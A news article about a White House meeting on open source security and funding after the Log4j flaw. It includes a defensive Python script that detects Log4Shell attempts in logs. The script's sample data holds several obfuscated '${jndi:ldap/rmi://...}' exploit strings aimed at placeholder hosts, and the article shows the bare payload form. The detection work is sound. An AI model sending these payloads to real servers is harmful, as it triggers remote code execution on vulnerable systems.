Log4j: the White House brings together the cream of tech to discuss the security of open source


A meeting is to discuss how to secure open source, with, between the lines, the question of how to fund the projects that are crucial to the tech industry.

In recent years, we have seen an accumulation of incidents involving open source: OpenSSL, Log4j and, to a lesser extent, the “faker.js” and “colors.js” software libraries. These problems would probably not be so serious if the projects were used by a handful of Internet users. But some programs, like OpenSSL and Log4j, are crucial to millions of other programs and to the users behind them.

Open source's problems are not a consequence of the source code being publicly available. They stem more from the insufficient means available to the community of developers to maintain projects properly. Volunteers are scarce, and those who do take part are unpaid. Why? Because there is not enough funding to pay teams to work on a given project on a regular basis.

A news item illustrated this situation somewhat dramatically: in January, it was reported that a volunteer developer chose to sabotage two open source projects to which he regularly contributed, in order to expose the precariousness of open source and, in fact, the insufficient security that can sometimes surround certain projects. Thousands of other programs that depended on these two libraries, “faker.js” and “colors.js”, were disrupted as a result.

Summit meeting for open source

This issue of open source funding could well be on the menu of upcoming discussions at the White House between several representatives of Silicon Valley and members of the American administration, as well as several federal agencies and departments. The meeting was reported on January 13 by Cyberscoop and picked up by The Verge. It is scheduled to take place on January 13.

Among the companies represented at the meeting are Apple, Google, Amazon, Meta (formerly Facebook), IBM and Microsoft, all American companies with very significant financial resources whose activities rely, in part, on open source at one level or another. Some of these groups already contribute to certain projects, and also release open source tools of their own.

Log4j, or the problem of dependency in tech, when certain projects rely on a small piece of code that goes almost unnoticed. // Source: XKCD

The open source world is also expected to be present, the English-language press reports, in particular the Apache Software Foundation, which oversees the Log4j project that hit the headlines at the end of 2021. GitHub and the Linux Foundation are also announced. In addition, the American company Oracle, which stewards the Java programming language that Log4j is written in, will also be there.

On the administration side, the departments of Commerce, Defense, Energy and Homeland Security are mentioned, as well as agencies such as CISA (the Cybersecurity and Infrastructure Security Agency), which oversaw the security of American elections, and NIST (the National Institute of Standards and Technology), which works in particular on cryptographic standards.

Log4j will be a long-term problem for tech

It can be hard to appreciate how important certain open source projects are to the web. Log4j is a Java library, a piece of reusable code that other programs “call” in order to perform certain actions without having to write them themselves, which saves time. In short, developers rely on the work of other developers.

The Log4j library's role is to record an application's activity in “logs”. This makes it possible to follow a program's behaviour and, when something goes wrong, to note the problem in an error report that can then be used to make corrections. The problem is that Log4j has a weakness, known as Log4Shell (CVE-2021-44228): vulnerable versions interpret certain strings in logged text as “lookups”, so an attacker who manages to get a string of the form “${jndi:ldap://…}” into something the application logs (a username, a browser's User-Agent header, and so on) can make the library fetch and execute unauthorized code (in short: malicious code) on the server running Log4j.

Since then, there has been a race to patch as successive vulnerabilities have been discovered. For the moment, the consensus is that the Log4j problem is likely to drag on for years and is genuinely serious, even if the risk is not really visible to the general public. One thing is certain: flaws in this library are already being used to deliver all kinds of horrors, such as botnets, cryptocurrency miners and ransomware.
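To make the mechanism described above concrete on the defender's side, here is a small detection script, added as an example and not taken from the article or from the Log4j project. It runs over a few constructed access-log lines (invented for this example; the addresses are from the RFC 5737 documentation ranges) and flags the “${jndi:…}” lookup at the heart of Log4Shell, after undoing the nested-lookup obfuscations (“${lower:j}”, “${::-j}”) that attackers used in the wild to slip past naive searches for the literal string “jndi”.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in log lines.

Added example, not code from the article or from the Log4j project. It undoes
the nested Log4j "lookup" tricks (${lower:j}, ${::-j}, ...) that attackers used
to hide the literal 'jndi' token, then looks for the resolved ${jndi:...} form.
"""
import re

# Constructed sample access-log lines (invented for this example; the IP
# addresses come from the RFC 5737 documentation ranges).
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Jan/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Jan/2022:10:02:11 +0000] "GET /login HTTP/1.1" 200 301 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
    '10.0.0.11 - - [13/Jan/2022:10:02:40 +0000] "GET /api HTTP/1.1" 200 77 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.12:1099/c}"',
    '10.0.0.13 - - [13/Jan/2022:10:03:00 +0000] "GET /x HTTP/1.1" 200 5 "-" "${env:HOME}"',
]

# Lookup rewrites that only change case or fall back to a default value.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# ${<lookup>:<key>:-<default>} with an empty lookup and key: '${::-j}' -> 'j'.
_DEFAULT = re.compile(r"\$\{[^${}:]*:[^${}:]*:-([^${}]*)\}")
# The resolved dangerous form: ${jndi:<scheme>:<target>} (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:\s*/*([^}]*)\}", re.IGNORECASE)
# Any remaining lookup syntax is worth a look even when it is not JNDI.
_ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def normalize_lookups(text, max_rounds=10):
    """Repeatedly resolve innermost case/default lookups until nothing changes."""
    for _ in range(max_rounds):
        resolved = _LOWER.sub(lambda m: m.group(1).lower(), text)
        resolved = _UPPER.sub(lambda m: m.group(1).upper(), resolved)
        resolved = _DEFAULT.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line):
    """Return a finding for one log line, or None if it looks benign."""
    resolved = normalize_lookups(line)
    jndi = _JNDI.search(resolved)
    if jndi:
        return {
            "severity": "high",
            "reason": "JNDI lookup (Log4Shell pattern)",
            "scheme": jndi.group(1).lower(),
            "target": jndi.group(2),
            "resolved": resolved,
        }
    if _ANY_LOOKUP.search(resolved):
        return {"severity": "medium", "reason": "Log4j lookup syntax", "resolved": resolved}
    return None


def scan_logs(lines):
    """Scan many lines; return (index, finding) pairs for the suspicious ones."""
    findings = []
    for index, line in enumerate(lines):
        finding = scan_line(line)
        if finding is not None:
            findings.append((index, finding))
    return findings


if __name__ == "__main__":
    for index, finding in scan_logs(SAMPLE_LOGS):
        print(f"line {index}: {finding['severity']:6} {finding['reason']}")
        if "target" in finding:
            print(f"        {finding['scheme']} -> {finding['target']}")
```

A scan like this only shows that someone tried; whether an attempt succeeded depends on the Log4j version on the target and on whether the server could reach the attacker's LDAP or RMI endpoint. It is a triage aid, not a fix: the durable remedy is upgrading Log4j to a patched release from Apache (or, where upgrading is impossible, removing the JndiLookup class from the log4j-core jar, as Apache's own advisory described).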

When, moreover, we know how much cyberspace has become an arena of confrontation between great powers, where espionage and hacking operations can be organized over several years, the White House's fears are understandable, as are its reasons for organizing such a meeting with the tech industry, to see how it can be mobilized further to avoid another Log4j. By paying more, perhaps.

Further reading

Source: @0xabdi

All about the Log4Shell security breach
